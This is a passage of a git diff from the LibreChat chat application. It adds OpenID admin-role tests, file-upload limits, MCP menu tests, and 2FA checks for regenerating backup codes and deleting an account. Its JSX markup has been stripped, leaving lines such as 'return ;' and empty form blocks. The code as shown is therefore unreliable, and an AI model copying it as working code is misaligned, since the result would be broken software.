'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required', 'admin-group-id'] }), + }); + + await validate(tokenset); + + // Graph API should be called only once (for required role), admin role reuses the result + expect(undici.fetch).toHaveBeenCalledTimes(1); + }); + + it('demotes existing admin when overage groups no longer contain admin role', async () => { + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + const existingAdminUser = { + _id: 'existingAdminId', + provider: 'openid', + email: tokenset.claims().email, + openidId: tokenset.claims().sub, + username: 'adminuser', + name: 'Admin User', + role: 'ADMIN', + }; + + findUser.mockImplementation(async (query) => { + if (query.openidId === tokenset.claims().sub || query.email === tokenset.claims().email) { + return existingAdminUser; + } + return null; + }); + + jwtDecode.mockReturnValue({ hasgroups: true }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['group-required'] }), + }); + + const { user } = await validate(tokenset); + + expect(user.role).toBe('USER'); + }); + + it('does not attempt overage for admin role when token kind is not id', async () => { + process.env.OPENID_REQUIRED_ROLE = 'requiredRole'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'roles'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + process.env.OPENID_ADMIN_ROLE = 'admin'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'access'; + + jwtDecode.mockReturnValue({ + roles: ['requiredRole'], + hasgroups: true, + }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + const { user } = await validate(tokenset); + + // No Graph call since admin uses access token (not id) + expect(undici.fetch).not.toHaveBeenCalled(); + expect(user.role).toBeUndefined(); + }); + + it('resolves admin via Graph independently when OPENID_REQUIRED_ROLE is not configured', async () => { + delete process.env.OPENID_REQUIRED_ROLE; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['admin-group-id'] }), + }); + + const { user } = await validate(tokenset); + expect(user.role).toBe('ADMIN'); + expect(undici.fetch).toHaveBeenCalledTimes(1); + }); + + it('denies admin when OPENID_REQUIRED_ROLE is absent and Graph does not contain admin group', async () => { + delete process.env.OPENID_REQUIRED_ROLE; + process.env.OPENID_ADMIN_ROLE = 'admin-group-id'; + process.env.OPENID_ADMIN_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_ADMIN_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + undici.fetch.mockResolvedValue({ + ok: true, + status: 200, + statusText: 'OK', + json: async () => ({ value: ['other-group'] }), + }); + + const { user } = await validate(tokenset); + expect(user).toBeTruthy(); + expect(user.role).toBeUndefined(); + }); + + it('denies login and logs error when OBO exchange throws', async () => { + const openidClient = require('openid-client'); + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + openidClient.genericGrantRequest.mockRejectedValueOnce(new Error('OBO exchange rejected')); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + const { user, details } = await validate(tokenset); + expect(user).toBe(false); + expect(details.message).toBe('You must have "group-required" role to log in.'); + expect(undici.fetch).not.toHaveBeenCalled(); + }); + + it('denies login when OBO exchange returns no access_token', async () => { + const openidClient = require('openid-client'); + process.env.OPENID_REQUIRED_ROLE = 'group-required'; + process.env.OPENID_REQUIRED_ROLE_PARAMETER_PATH = 'groups'; + process.env.OPENID_REQUIRED_ROLE_TOKEN_KIND = 'id'; + + jwtDecode.mockReturnValue({ hasgroups: true }); + openidClient.genericGrantRequest.mockResolvedValueOnce({ expires_in: 3600 }); + + await setupOpenId(); + verifyCallback = require('openid-client/passport').__getVerifyCallbackByName('openid'); + + const { user, details } = await validate(tokenset); + expect(user).toBe(false); + expect(details.message).toBe('You must have "group-required" role to log in.'); + expect(undici.fetch).not.toHaveBeenCalled(); + }); + }); + it('should attempt to download and save the avatar if picture is provided', async () => { // Act const { user } = await validate(tokenset); diff --git a/client/src/components/Chat/Input/Files/AttachFileChat.tsx b/client/src/components/Chat/Input/Files/AttachFileChat.tsx index 00a0b7aaa8..2f954d01d5 100644 --- a/client/src/components/Chat/Input/Files/AttachFileChat.tsx +++ b/client/src/components/Chat/Input/Files/AttachFileChat.tsx @@ -91,7 +91,7 @@ function AttachFileChat({ if (isAssistants && endpointSupportsFiles && !isUploadDisabled) { return ; - } else if (isAgents || (endpointSupportsFiles && !isUploadDisabled)) { + } else if ((isAgents || endpointSupportsFiles) && !isUploadDisabled) { return ( > = {}; let mockAgentQueryData: Partial | undefined; @@ -65,6 +67,7 @@ function renderComponent(conversation: Record | null, disableIn describe('AttachFileChat', () => { beforeEach(() => { + mockFileConfig = defaultFileConfig; mockAgentsMap = {}; mockAgentQueryData = undefined; mockAttachFileMenuProps = {}; @@ -148,6 +151,60 @@ describe('AttachFileChat', () => { }); }); + describe('upload disabled rendering', () => { + it('renders null for agents endpoint when fileConfig.agents.disabled is true', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.agents]: { disabled: true }, + }, + }); + const { container } = renderComponent({ + endpoint: EModelEndpoint.agents, + agent_id: 'agent-1', + }); + expect(container.innerHTML).toBe(''); + }); + + it('renders null for agents endpoint when disableInputs is true', () => { + const { container } = renderComponent( + { endpoint: EModelEndpoint.agents, agent_id: 'agent-1' }, + true, + ); + expect(container.innerHTML).toBe(''); + }); + + it('renders AttachFile for assistants endpoint when not disabled', () => { + renderComponent({ endpoint: EModelEndpoint.assistants }); + expect(screen.getByTestId('attach-file')).toBeInTheDocument(); + }); + + it('renders AttachFileMenu when provider-specific config overrides agents disabled', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + Moonshot: { disabled: false, fileLimit: 5 }, + [EModelEndpoint.agents]: { disabled: true }, + }, + }); + mockAgentsMap = { + 'agent-1': { provider: 'Moonshot', model_parameters: {} } as Partial, + }; + renderComponent({ endpoint: EModelEndpoint.agents, agent_id: 'agent-1' }); + expect(screen.getByTestId('attach-file-menu')).toBeInTheDocument(); + }); + + it('renders null for assistants endpoint when fileConfig.assistants.disabled is true', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.assistants]: { disabled: true }, + }, + }); + const { container } = renderComponent({ + endpoint: EModelEndpoint.assistants, + }); + expect(container.innerHTML).toBe(''); + }); + }); + describe('endpointFileConfig resolution', () => { it('passes Moonshot-specific file config for agent with Moonshot provider', () => { mockAgentsMap = { diff --git a/client/src/components/Chat/Input/MCPSelect.tsx b/client/src/components/Chat/Input/MCPSelect.tsx index a5356f5094..13a86c856a 100644 --- a/client/src/components/Chat/Input/MCPSelect.tsx +++ b/client/src/components/Chat/Input/MCPSelect.tsx @@ -1,4 +1,4 @@ -import React, { memo, useMemo, useCallback, useRef } from 'react'; +import React, { memo, useMemo } from 'react'; import * as Ariakit from '@ariakit/react'; import { ChevronDown } from 'lucide-react'; import { PermissionTypes, Permissions } from 'librechat-data-provider'; @@ -27,24 +27,9 @@ function MCPSelectContent() { const menuStore = Ariakit.useMenuStore({ focusLoop: true }); const isOpen = menuStore.useState('open'); - const focusedElementRef = useRef(null); const selectedCount = mcpValues?.length ?? 0; - // Wrap toggleServerSelection to preserve focus after state update - const handleToggle = useCallback( - (serverName: string) => { - // Save currently focused element - focusedElementRef.current = document.activeElement as HTMLElement; - toggleServerSelection(serverName); - // Restore focus after React re-renders - requestAnimationFrame(() => { - focusedElementRef.current?.focus(); - }); - }, - [toggleServerSelection], - ); - const selectedServers = useMemo(() => { if (!mcpValues || mcpValues.length === 0) { return []; @@ -103,6 +88,8 @@ function MCPSelectContent() { ))} diff --git a/client/src/components/Chat/Input/MCPSubMenu.tsx b/client/src/components/Chat/Input/MCPSubMenu.tsx index b0b8fad1bb..f8e617cba3 100644 --- a/client/src/components/Chat/Input/MCPSubMenu.tsx +++ b/client/src/components/Chat/Input/MCPSubMenu.tsx @@ -35,7 +35,6 @@ const MCPSubMenu = React.forwardRef( placement: 'right', }); - // Don't render if no MCP servers are configured if (!selectableServers || selectableServers.length === 0) { return null; } diff --git a/client/src/components/Chat/Input/__tests__/MCPSelect.spec.tsx b/client/src/components/Chat/Input/__tests__/MCPSelect.spec.tsx new file mode 100644 index 0000000000..7662ee5e6e --- /dev/null +++ b/client/src/components/Chat/Input/__tests__/MCPSelect.spec.tsx @@ -0,0 +1,142 @@ +import React from 'react'; +import userEvent from '@testing-library/user-event'; +import { render, screen, within } from '@testing-library/react'; +import MCPSelect from '../MCPSelect'; + +const mockToggleServerSelection = jest.fn(); + +const defaultMcpServerManager = { + localize: (key: string) => key, + isPinned: true, + mcpValues: [] as string[], + placeholderText: 'MCP Servers', + selectableServers: [ + { serverName: 'server-a', config: { title: 'Server A' } }, + { serverName: 'server-b', config: { title: 'Server B' } }, + ], + connectionStatus: {}, + isInitializing: () => false, + getConfigDialogProps: () => null, + toggleServerSelection: mockToggleServerSelection, + getServerStatusIconProps: () => null, +}; + +let mockCanUseMcp = true; +let mockMcpServerManager = { ...defaultMcpServerManager }; + +jest.mock('~/Providers', () => ({ + useBadgeRowContext: () => ({ + conversationId: 'test-conv', + storageContextKey: undefined, + mcpServerManager: mockMcpServerManager, + }), +})); + +jest.mock('~/hooks', () => ({ + useLocalize: () => (key: string) => key, + useHasAccess: () => mockCanUseMcp, +})); + +jest.mock('@librechat/client', () => { + // eslint-disable-next-line @typescript-eslint/no-require-imports + const R = require('react'); + return { + TooltipAnchor: ({ + children, + render, + }: { + children: React.ReactNode; + render: React.ReactElement; + }) => R.cloneElement(render, {}, ...(Array.isArray(children) ? children : [children])), + MCPIcon: ({ className }: { className?: string }) => R.createElement('span', { className }), + Spinner: ({ className }: { className?: string }) => R.createElement('span', { className }), + }; +}); + +jest.mock('~/components/MCP/MCPConfigDialog', () => ({ + __esModule: true, + default: () => null, +})); + +describe('MCPSelect', () => { + beforeEach(() => { + jest.clearAllMocks(); + mockCanUseMcp = true; + mockMcpServerManager = { ...defaultMcpServerManager }; + }); + + it('renders the menu button', () => { + render(); + expect(screen.getByRole('button', { name: /MCP Servers/i })).toBeInTheDocument(); + }); + + it('opens menu on button click and shows server items', async () => { + const user = userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + + const menu = screen.getByRole('menu', { name: /com_ui_mcp_servers/i }); + expect(menu).toBeVisible(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server A/i })).toBeInTheDocument(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server B/i })).toBeInTheDocument(); + }); + + it('closes menu on Escape', async () => { + const user = userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + expect(screen.getByRole('menu', { name: /com_ui_mcp_servers/i })).toBeVisible(); + + await user.keyboard('{Escape}'); + expect(screen.getByRole('button', { name: /MCP Servers/i })).toHaveAttribute( + 'aria-expanded', + 'false', + ); + }); + + it('keeps menu open after toggling a server item', async () => { + const user = userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + await user.click(screen.getByRole('menuitemcheckbox', { name: /Server A/i })); + + expect(mockToggleServerSelection).toHaveBeenCalledWith('server-a'); + expect(screen.getByRole('menu', { name: /com_ui_mcp_servers/i })).toBeVisible(); + }); + + it('arrow-key navigation wraps from last item to first', async () => { + const user = userEvent.setup(); + render(); + + await user.click(screen.getByRole('button', { name: /MCP Servers/i })); + const items = screen.getAllByRole('menuitemcheckbox'); + expect(items).toHaveLength(2); + + await user.keyboard('{ArrowDown}'); + await user.keyboard('{ArrowDown}'); + await user.keyboard('{ArrowDown}'); + expect(items[0]).toHaveFocus(); + }); + + it('renders nothing when user lacks MCP access', () => { + mockCanUseMcp = false; + const { container } = render(); + expect(container.firstChild).toBeNull(); + expect(screen.queryByRole('button')).not.toBeInTheDocument(); + }); + + it('renders nothing when selectableServers is empty', () => { + mockMcpServerManager = { ...defaultMcpServerManager, selectableServers: [] }; + const { container } = render(); + expect(container.firstChild).toBeNull(); + }); + + it('renders nothing when not pinned and no servers selected', () => { + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: false, mcpValues: [] }; + const { container } = render(); + expect(container.firstChild).toBeNull(); + }); +}); diff --git a/client/src/components/Chat/Input/__tests__/MCPSubMenu.spec.tsx b/client/src/components/Chat/Input/__tests__/MCPSubMenu.spec.tsx new file mode 100644 index 0000000000..be8fb5d9c2 --- /dev/null +++ b/client/src/components/Chat/Input/__tests__/MCPSubMenu.spec.tsx @@ -0,0 +1,156 @@ +import React from 'react'; +import * as Ariakit from '@ariakit/react'; +import userEvent from '@testing-library/user-event'; +import { render, screen, within } from '@testing-library/react'; +import MCPSubMenu from '../MCPSubMenu'; + +const mockToggleServerSelection = jest.fn(); +const mockSetIsPinned = jest.fn(); + +const defaultMcpServerManager = { + isPinned: true, + mcpValues: [] as string[], + setIsPinned: mockSetIsPinned, + placeholderText: 'MCP Servers', + selectableServers: [ + { serverName: 'server-a', config: { title: 'Server A' } }, + { serverName: 'server-b', config: { title: 'Server B', description: 'Second server' } }, + ], + connectionStatus: {}, + isInitializing: () => false, + getConfigDialogProps: () => null, + toggleServerSelection: mockToggleServerSelection, + getServerStatusIconProps: () => null, +}; + +let mockMcpServerManager = { ...defaultMcpServerManager }; + +jest.mock('~/Providers', () => ({ + useBadgeRowContext: () => ({ + storageContextKey: undefined, + mcpServerManager: mockMcpServerManager, + }), +})); + +jest.mock('~/hooks', () => ({ + useLocalize: () => (key: string) => key, + useHasAccess: () => true, +})); + +jest.mock('@librechat/client', () => { + // eslint-disable-next-line @typescript-eslint/no-require-imports + const R = require('react'); + return { + MCPIcon: ({ className }: { className?: string }) => R.createElement('span', { className }), + PinIcon: ({ unpin }: { unpin?: boolean }) => + R.createElement('span', { 'data-testid': unpin ? 'unpin-icon' : 'pin-icon' }), + Spinner: ({ className }: { className?: string }) => R.createElement('span', { className }), + }; +}); + +jest.mock('~/components/MCP/MCPConfigDialog', () => ({ + __esModule: true, + default: () => null, +})); + +function ParentMenu({ children }: { children: React.ReactNode }) { + return ( + + {/* eslint-disable-next-line i18next/no-literal-string */} + Parent + {children} + + ); +} + +function renderSubMenu(props: React.ComponentProps = {}) { + return render( + + + , + ); +} + +describe('MCPSubMenu', () => { + beforeEach(() => { + jest.clearAllMocks(); + mockMcpServerManager = { ...defaultMcpServerManager }; + }); + + it('renders nothing when selectableServers is empty', () => { + mockMcpServerManager = { ...defaultMcpServerManager, selectableServers: [] }; + renderSubMenu(); + expect(screen.queryByText('MCP Servers')).not.toBeInTheDocument(); + }); + + it('renders the submenu trigger with default placeholder', () => { + renderSubMenu(); + expect(screen.getByText('MCP Servers')).toBeInTheDocument(); + }); + + it('renders custom placeholder when provided', () => { + renderSubMenu({ placeholder: 'Custom Label' }); + expect(screen.getByText('Custom Label')).toBeInTheDocument(); + expect(screen.queryByText('MCP Servers')).not.toBeInTheDocument(); + }); + + it('opens submenu and shows real server items', async () => { + const user = userEvent.setup(); + renderSubMenu(); + + await user.click(screen.getByText('MCP Servers')); + + const menu = screen.getByRole('menu', { name: /com_ui_mcp_servers/i }); + expect(menu).toBeVisible(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server A/i })).toBeInTheDocument(); + expect(within(menu).getByRole('menuitemcheckbox', { name: /Server B/i })).toBeInTheDocument(); + }); + + it('keeps menu open after toggling a server item', async () => { + const user = userEvent.setup(); + renderSubMenu(); + + await user.click(screen.getByText('MCP Servers')); + await user.click(screen.getByRole('menuitemcheckbox', { name: /Server A/i })); + + expect(mockToggleServerSelection).toHaveBeenCalledWith('server-a'); + expect(screen.getByRole('menu', { name: /com_ui_mcp_servers/i })).toBeVisible(); + }); + + it('calls setIsPinned with toggled value when pin button is clicked', async () => { + const user = userEvent.setup(); + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: false }; + renderSubMenu(); + + await user.click(screen.getByRole('button', { name: /com_ui_pin/i })); + + expect(mockSetIsPinned).toHaveBeenCalledWith(true); + }); + + it('arrow-key navigation wraps from last item to first', async () => { + const user = userEvent.setup(); + renderSubMenu(); + + await user.click(screen.getByText('MCP Servers')); + const items = screen.getAllByRole('menuitemcheckbox'); + expect(items).toHaveLength(2); + + await user.click(items[1]); + expect(items[1]).toHaveFocus(); + + await user.keyboard('{ArrowDown}'); + expect(items[0]).toHaveFocus(); + }); + + it('pin button shows unpin label when pinned', () => { + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: true }; + renderSubMenu(); + expect(screen.getByRole('button', { name: /com_ui_unpin/i })).toBeInTheDocument(); + }); + + it('pin button shows pin label when not pinned', () => { + mockMcpServerManager = { ...defaultMcpServerManager, isPinned: false }; + renderSubMenu(); + expect(screen.getByRole('button', { name: /com_ui_pin/i })).toBeInTheDocument(); + }); +}); diff --git a/client/src/components/Messages/Content/Error.tsx b/client/src/components/Messages/Content/Error.tsx index 469e29fe32..ff2f2d7e90 100644 --- a/client/src/components/Messages/Content/Error.tsx +++ b/client/src/components/Messages/Content/Error.tsx @@ -41,6 +41,7 @@ const errorMessages = { [ErrorTypes.NO_USER_KEY]: 'com_error_no_user_key', [ErrorTypes.INVALID_USER_KEY]: 'com_error_invalid_user_key', [ErrorTypes.NO_BASE_URL]: 'com_error_no_base_url', + [ErrorTypes.INVALID_BASE_URL]: 'com_error_invalid_base_url', [ErrorTypes.INVALID_ACTION]: `com_error_${ErrorTypes.INVALID_ACTION}`, [ErrorTypes.INVALID_REQUEST]: `com_error_${ErrorTypes.INVALID_REQUEST}`, [ErrorTypes.REFUSAL]: 'com_error_refusal', diff --git a/client/src/components/Nav/Favorites/FavoriteItem.tsx b/client/src/components/Nav/Favorites/FavoriteItem.tsx index 173be27d00..248008869d 100644 --- a/client/src/components/Nav/Favorites/FavoriteItem.tsx +++ b/client/src/components/Nav/Favorites/FavoriteItem.tsx @@ -126,8 +126,8 @@ export default function FavoriteItem({ className={cn( 'absolute right-2 flex items-center', isPopoverActive - ? 'opacity-100' - : 'opacity-0 group-focus-within:opacity-100 group-hover:opacity-100', + ? 'pointer-events-auto opacity-100' + : 'pointer-events-none opacity-0 group-focus-within:pointer-events-auto group-focus-within:opacity-100 group-hover:pointer-events-auto group-hover:opacity-100', )} onClick={(e) => e.stopPropagation()} > diff --git a/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx b/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx index c89ce61fff..e66cb7b08a 100644 --- a/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx +++ b/client/src/components/Nav/SettingsTabs/Account/BackupCodesItem.tsx @@ -1,12 +1,23 @@ import React, { useState } from 'react'; import { RefreshCcw } from 'lucide-react'; +import { useSetRecoilState } from 'recoil'; import { motion, AnimatePresence } from 'framer-motion'; -import { TBackupCode, TRegenerateBackupCodesResponse, type TUser } from 'librechat-data-provider'; +import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp'; +import type { + TRegenerateBackupCodesResponse, + TRegenerateBackupCodesRequest, + TBackupCode, + TUser, +} from 'librechat-data-provider'; import { - OGDialog, + InputOTPSeparator, + InputOTPGroup, + InputOTPSlot, OGDialogContent, OGDialogTitle, OGDialogTrigger, + OGDialog, + InputOTP, Button, Label, Spinner, @@ -15,7 +26,6 @@ import { } from '@librechat/client'; import { useRegenerateBackupCodesMutation } from '~/data-provider'; import { useAuthContext, useLocalize } from '~/hooks'; -import { useSetRecoilState } from 'recoil'; import store from '~/store'; const BackupCodesItem: React.FC = () => { @@ -24,25 +34,30 @@ const BackupCodesItem: React.FC = () => { const { showToast } = useToastContext(); const setUser = useSetRecoilState(store.user); const [isDialogOpen, setDialogOpen] = useState(false); + const [otpToken, setOtpToken] = useState(''); + const [useBackup, setUseBackup] = useState(false); const { mutate: regenerateBackupCodes, isLoading } = useRegenerateBackupCodesMutation(); + const needs2FA = !!user?.twoFactorEnabled; + const fetchBackupCodes = (auto: boolean = false) => { - regenerateBackupCodes(undefined, { + let payload: TRegenerateBackupCodesRequest | undefined; + if (needs2FA && otpToken.trim()) { + payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() }; + } + + regenerateBackupCodes(payload, { onSuccess: (data: TRegenerateBackupCodesResponse) => { - const newBackupCodes: TBackupCode[] = data.backupCodesHash.map((codeHash) => ({ - codeHash, - used: false, - usedAt: null, - })); + const newBackupCodes: TBackupCode[] = data.backupCodesHash; setUser((prev) => ({ ...prev, backupCodes: newBackupCodes }) as TUser); + setOtpToken(''); showToast({ message: localize('com_ui_backup_codes_regenerated'), status: 'success', }); - // Trigger file download only when user explicitly clicks the button. if (!auto && newBackupCodes.length) { const codesString = data.backupCodes.join('\n'); const blob = new Blob([codesString], { type: 'text/plain;charset=utf-8' }); @@ -66,6 +81,8 @@ const BackupCodesItem: React.FC = () => { fetchBackupCodes(false); }; + const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6); + return (
@@ -161,10 +178,10 @@ const BackupCodesItem: React.FC = () => { ); })}
-
+
)} + {needs2FA && ( +
+ +
+ + {useBackup ? ( + + + + + + + + + + + ) : ( + <> + + + + + + + + + + + + + )} + +
+ +
+ )} diff --git a/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx b/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx index e879a0f2c6..d9c432c6a2 100644 --- a/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx +++ b/client/src/components/Nav/SettingsTabs/Account/DeleteAccount.tsx @@ -1,16 +1,22 @@ -import { LockIcon, Trash } from 'lucide-react'; import React, { useState, useCallback } from 'react'; +import { LockIcon, Trash } from 'lucide-react'; +import { REGEXP_ONLY_DIGITS, REGEXP_ONLY_DIGITS_AND_CHARS } from 'input-otp'; import { - Label, - Input, - Button, - Spinner, - OGDialog, + InputOTPSeparator, OGDialogContent, OGDialogTrigger, OGDialogHeader, + InputOTPGroup, OGDialogTitle, + InputOTPSlot, + OGDialog, + InputOTP, + Spinner, + Button, + Label, + Input, } from '@librechat/client'; +import type { TDeleteUserRequest } from 'librechat-data-provider'; import { useDeleteUserMutation } from '~/data-provider'; import { useAuthContext } from '~/hooks/AuthContext'; import { LocalizeFunction } from '~/common'; @@ -21,16 +27,27 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea const localize = useLocalize(); const { user, logout } = useAuthContext(); const { mutate: deleteUser, isLoading: isDeleting } = useDeleteUserMutation({ - onMutate: () => logout(), + onSuccess: () => logout(), }); const [isDialogOpen, setDialogOpen] = useState(false); const [isLocked, setIsLocked] = useState(true); + const [otpToken, setOtpToken] = useState(''); + const [useBackup, setUseBackup] = useState(false); + + const needs2FA = !!user?.twoFactorEnabled; const handleDeleteUser = () => { - if (!isLocked) { - deleteUser(undefined); + if (isLocked) { + return; } + + let payload: TDeleteUserRequest | undefined; + if (needs2FA && otpToken.trim()) { + payload = useBackup ? { backupCode: otpToken.trim() } : { token: otpToken.trim() }; + } + + deleteUser(payload); }; const handleInputChange = useCallback( @@ -42,6 +59,8 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea [user?.email], ); + const otpReady = !needs2FA || otpToken.length === (useBackup ? 8 : 6); + return ( <> @@ -79,7 +98,60 @@ const DeleteAccount = ({ disabled = false }: { title?: string; disabled?: boolea (e) => handleInputChange(e.target.value), )}
- {renderDeleteButton(handleDeleteUser, isDeleting, isLocked, localize)} + {needs2FA && ( +
+ +
+ + {useBackup ? ( + + + + + + + + + + + ) : ( + <> + + + + + + + + + + + + + )} + +
+ +
+ )} + {renderDeleteButton(handleDeleteUser, isDeleting, isLocked || !otpReady, localize)}
diff --git a/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx b/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx index aeb0dd3ff9..2bbd3fea22 100644 --- a/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx +++ b/client/src/components/SidePanel/Agents/__tests__/AgentFileConfig.spec.tsx @@ -18,7 +18,7 @@ const mockEndpointsConfig: TEndpointsConfig = { 'Some Endpoint': { type: EModelEndpoint.custom, userProvide: false, order: 9999 }, }; -let mockFileConfig = mergeFileConfig({ +const defaultFileConfig = mergeFileConfig({ endpoints: { Moonshot: { fileLimit: 5 }, [EModelEndpoint.agents]: { fileLimit: 20 }, @@ -26,6 +26,8 @@ let mockFileConfig = mergeFileConfig({ }, }); +let mockFileConfig = defaultFileConfig; + jest.mock('~/data-provider', () => ({ useGetEndpointsQuery: () => ({ data: mockEndpointsConfig }), useGetFileConfig: ({ select }: { select?: (data: unknown) => unknown }) => ({ @@ -118,13 +120,16 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => { }); describe('disabled state', () => { + beforeEach(() => { + mockFileConfig = defaultFileConfig; + }); + it('reports not disabled for standard config', () => { render(); expect(screen.getByTestId('disabled').textContent).toBe('false'); }); it('reports disabled when provider-specific config is disabled', () => { - const original = mockFileConfig; mockFileConfig = mergeFileConfig({ endpoints: { Moonshot: { disabled: true }, @@ -135,8 +140,44 @@ describe('AgentPanel file config resolution (useAgentFileConfig)', () => { render(); expect(screen.getByTestId('disabled').textContent).toBe('true'); + }); - mockFileConfig = original; + it('reports disabled when agents config is disabled and no provider set', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.agents]: { disabled: true }, + default: { fileLimit: 10 }, + }, + }); + + render(); + expect(screen.getByTestId('disabled').textContent).toBe('true'); + }); + + it('reports disabled when agents is disabled and provider has no specific config', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + [EModelEndpoint.agents]: { disabled: true }, + default: { fileLimit: 10 }, + }, + }); + + render(); + expect(screen.getByTestId('disabled').textContent).toBe('true'); + }); + + it('provider-specific enabled overrides agents disabled', () => { + mockFileConfig = mergeFileConfig({ + endpoints: { + Moonshot: { disabled: false, fileLimit: 5 }, + [EModelEndpoint.agents]: { disabled: true }, + default: { fileLimit: 10 }, + }, + }); + + render(); + expect(screen.getByTestId('disabled').textContent).toBe('false'); + expect(screen.getByTestId('fileLimit').textContent).toBe('5'); }); }); diff --git a/client/src/components/SidePanel/Files/PanelTable.tsx b/client/src/components/SidePanel/Files/PanelTable.tsx index 2fc8f7031b..e67e16abdd 100644 --- a/client/src/components/SidePanel/Files/PanelTable.tsx +++ b/client/src/components/SidePanel/Files/PanelTable.tsx @@ -24,14 +24,14 @@ import { type ColumnFiltersState, } from '@tanstack/react-table'; import { - fileConfig as defaultFileConfig, - checkOpenAIStorage, - mergeFileConfig, megabyte, + mergeFileConfig, + checkOpenAIStorage, isAssistantsEndpoint, getEndpointFileConfig, - type TFile, + fileConfig as defaultFileConfig, } from 'librechat-data-provider'; +import type { TFile } from 'librechat-data-provider'; import { MyFilesModal } from '~/components/Chat/Input/Files/MyFilesModal'; import { useFileMapContext, useChatContext } from '~/Providers'; import { useLocalize, useUpdateFiles } from '~/hooks'; @@ -86,7 +86,7 @@ export default function DataTable({ columns, data }: DataTablePro const fileMap = useFileMapContext(); const { showToast } = useToastContext(); - const { setFiles, conversation } = useChatContext(); + const { files, setFiles, conversation } = useChatContext(); const { data: fileConfig = null } = useGetFileConfig({ select: (data) => mergeFileConfig(data), }); @@ -142,7 +142,15 @@ export default function DataTable({ columns, data }: DataTablePro return; } - if (fileData.bytes > (endpointFileConfig.fileSizeLimit ?? Number.MAX_SAFE_INTEGER)) { + if (endpointFileConfig.fileLimit && files.size >= endpointFileConfig.fileLimit) { + showToast({ + message: `${localize('com_ui_attach_error_limit')} ${endpointFileConfig.fileLimit} files (${endpoint})`, + status: 'error', + }); + return; + } + + if (fileData.bytes >= (endpointFileConfig.fileSizeLimit ?? Number.MAX_SAFE_INTEGER)) { showToast({ message: `${localize('com_ui_attach_error_size')} ${ (endpointFileConfig.fileSizeLimit ?? 0) / megabyte @@ -160,6 +168,22 @@ export default function DataTable({ columns, data }: DataTablePro return; } + if (endpointFileConfig.totalSizeLimit) { + const existing = files.get(fileData.file_id); + let currentTotalSize = 0; + for (const f of files.values()) { + currentTotalSize += f.size; + } + currentTotalSize -= existing?.size ?? 0; + if (currentTotalSize + fileData.bytes > endpointFileConfig.totalSizeLimit) { + showToast({ + message: 